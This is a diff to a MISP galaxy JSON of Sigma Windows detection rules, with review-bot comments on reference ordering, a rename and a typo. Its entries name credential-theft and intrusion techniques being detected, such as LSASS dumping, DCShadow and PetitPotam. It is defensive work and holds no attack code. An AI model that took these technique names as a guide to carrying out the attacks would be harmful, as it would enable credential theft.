"65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "value": "LSASS Access from Non System Account" }, 
@@ -4904,6 +6205,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "value": "Possible Impacket SecretDump Remote Activity" }, @@ -4946,9 +6270,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -4956,6 +6280,15 @@ "attack.t1207" ] }, + "related": [ + { + "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "value": "Possible DC Shadow Attack" }, @@ -4980,6 +6313,15 @@ "attack.t1003.004" ] }, + "related": [ + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", "value": "DPAPI Domain Backup Key Extraction" }, 
@@ -5007,6 +6349,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", "value": "Scheduled Task Deletion" }, @@ -5033,6 +6384,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" }, @@ -5050,8 +6410,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -5059,6 +6419,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", "value": "Unauthorized System Time Modification" }, @@ -5111,6 +6480,15 @@ "attack.t1133" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "value": "Failed Logon From Public IP" }, 
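Review bot: The `refs` list in the -5050 hunk now holds two free-text entries next to URLs, `"Live environment caused by malware"` (moved to the new side here) and `"Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)"`, while every other refs entry in these hunks is a URL. Consumers that render `refs` as links will either produce broken links or have to special-case these strings. Since the text is copied from the upstream rule's `references`, the generator could keep only entries that parse as a URL and move the rest into the description, or document that `refs` may contain prose.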
@@ -5135,6 +6513,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "value": "VSSAudit Security Event Source Registration" }, @@ -5184,6 +6571,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "value": "Password Change on Directory Service Restore Mode (DSRM) Account" }, @@ -5205,6 +6601,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", "value": "Possible Remote Password Change Through SAMR" }, @@ -5229,6 +6634,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", "value": "Login with WMI" }, @@ -5260,6 +6674,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", "value": "Chafer Activity - Security" }, 
@@ -5286,6 +6716,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "value": "Invoke-Obfuscation STDIN+ Launcher - Security" }, @@ -5311,6 +6750,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", "value": "Suspicious Multiple File Rename Or Delete Occurred" }, @@ -5327,9 +6775,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", - "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" ], "tags": [ @@ -5338,6 +6785,15 @@ "attack.t1134.001" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "value": "Access Token Abuse" }, @@ -5386,6 +6842,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" }, 
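Review bot: The -5327 hunk is the only refs hunk in this series that removes an entry rather than reordering one: `https://attack.mitre.org/techniques/T1134/001/` is dropped while the element's `attack.t1134.001` tag in the next hunk (-5338) stays. If the removal mirrors the upstream rule it is fine but easy to miss among the reorder-only hunks, so it deserves a mention in the commit message; if it is an artefact of de-duplication in the generator it should be restored. A deterministic refs order would have made this deletion stand out on its own.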
@@ -5460,6 +6925,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "value": "Invoke-Obfuscation CLIP+ Launcher - Security" }, @@ -5514,6 +6988,15 @@ "attack.s0039" ] }, + "related": [ + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", "value": "Reconnaissance Activity" }, @@ -5540,6 +7023,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "value": "Invoke-Obfuscation Via Use Clip - Security" }, @@ -5567,6 +7059,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "value": "Remote Task Creation via ATSVC Named Pipe" }, @@ -5605,10 +7106,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://twitter.com/Flangvik/status/1283054508084473861", "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ 
@@ -5647,6 +7148,50 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "value": "Credential Dumping Tools Service Execution - Security" }, @@ -5671,6 +7216,15 @@ "attack.t1003.004" ] }, + "related": [ + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "value": "DPAPI Domain Master Key Backup Attempt" }, @@ -5695,6 +7249,15 @@ "attack.t1010" ] }, + "related": [ + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", "value": "SCM Database Handle Failure" }, 
@@ -5721,6 +7284,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" }, @@ -5791,6 +7363,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", "value": "Tap Driver Installation - Security" }, @@ -5807,9 +7388,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/topotam/PetitPotam", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/topotam/PetitPotam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ 
@@ -5817,16 +7398,25 @@ "attack.t1187" ] }, + "related": [ + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "value": "PetitPotam Suspicious Kerberos TGT Request" }, { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019/04/08", "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. 
Also try to exclude users, which are allowed to load drivers." + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "filename": "win_security_user_driver_loaded.yml", "level": "medium", @@ -5843,7 +7433,7 @@ ] }, "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User" + "value": "Potential Privileged System Service Operation - SeLoadDriverPrivilege" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", @@ -5868,6 +7458,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", "value": "Invoke-Obfuscation VAR+ Launcher - Security" }, @@ -5894,6 +7493,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" }, @@ -5919,6 +7534,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "value": "RottenPotato Like Attack Pattern" }, 
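Review bot: The rewritten `falsepositive` string keeps the misspelling `legimate` (for `legitimate`) from the old text while rewording everything around it, so the typo now reads as intentional; the hunk starts on the previous line with the `description` rewrite of the same element. Both strings are copied from the upstream rule named on the next line, `win_security_user_driver_loaded.yml`, so the correction belongs there rather than in the generated JSON: `Other legitimate tools loading drivers.`.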
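Review bot: Renaming `value` from `Suspicious Driver Loaded By User` to `Potential Privileged System Service Operation - SeLoadDriverPrivilege` in the -5843 hunk keeps the `uuid` stable, which is right for the cluster itself, but as far as I know MISP builds the galaxy tag from the value string, so events already tagged with the old name will no longer match this element. If this galaxy is meant to be attached to events, consider carrying the old name as a synonym in `meta` (the cluster format supports a `synonyms` list) so the previous tag still resolves, or note in the commit message that renames from upstream are not preserved.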
@@ -5936,8 +7560,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ @@ -5971,6 +7595,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", "value": "Remote WMI ActiveScriptEventConsumers" }, @@ -6044,6 +7677,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "value": "External Disk Drive Or USB Storage Device" }, @@ -6060,8 +7702,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], 
@@ -6091,6 +7733,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", "value": "SCM Database Privileged Operation" }, @@ -6116,6 +7767,22 @@ "attack.t1136.002" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" }, @@ -6132,8 +7799,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" ], "tags": [ @@ -6143,6 +7810,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "value": "Important Scheduled Task Deleted/Disabled" }, 
@@ -6170,6 +7846,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", "value": "Rare Schtasks Creations" }, @@ -6218,6 +7903,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "value": "PowerShell Scripts Installed as Services - Security" }, @@ -6244,6 +7938,15 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8400629e-79a9-4737-b387-5db940ab2367", "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" }, @@ -6292,6 +7995,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "value": "HybridConnectionManager Service Installation" }, @@ -6345,6 +8057,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" }, 
@@ -6393,6 +8114,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "17d619c1-e020-4347-957e-1d1207455c93", "value": "Active Directory Replication from Non Machine Account" }, @@ -6430,9 +8160,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], 
@@ -6483,16 +8213,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -6501,6 +8231,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "value": "ETW Logging Disabled In .NET Processes - Registry" }, @@ -6527,6 +8266,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "value": "SAM Registry Hive Handle Request" }, @@ -6577,6 +8325,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "value": "Suspicious Scheduled Task Creation" }, @@ -6607,6 +8364,22 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "value": "RDP over Reverse SSH Tunnel WFP" }, @@ -6656,6 +8429,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "value": "Password Dumper Activity on LSASS" }, 
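Review bot: The `@@ -6483,16 +8213,16 @@` hunk, like the smaller `refs` hunks throughout this diff, only reorders reference URLs without adding or removing any, which suggests the generator emits `refs` from an unordered collection. That churn makes every regeneration of this multi-thousand-line file noisy and makes it hard for a reviewer to notice an actually new or altered URL among the moves, which matters for a file whose links are consumed as threat-intel references. The generator script is not in this diff, so this is inferred; if it builds `refs` from a set, sort the list before dumping (`refs = sorted(set(refs))`) or preserve the rule's original order, keeping the trailing SigmaHQ link last as every hunk here does. The JSON itself needs no hand edit beyond a regeneration with stable ordering.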
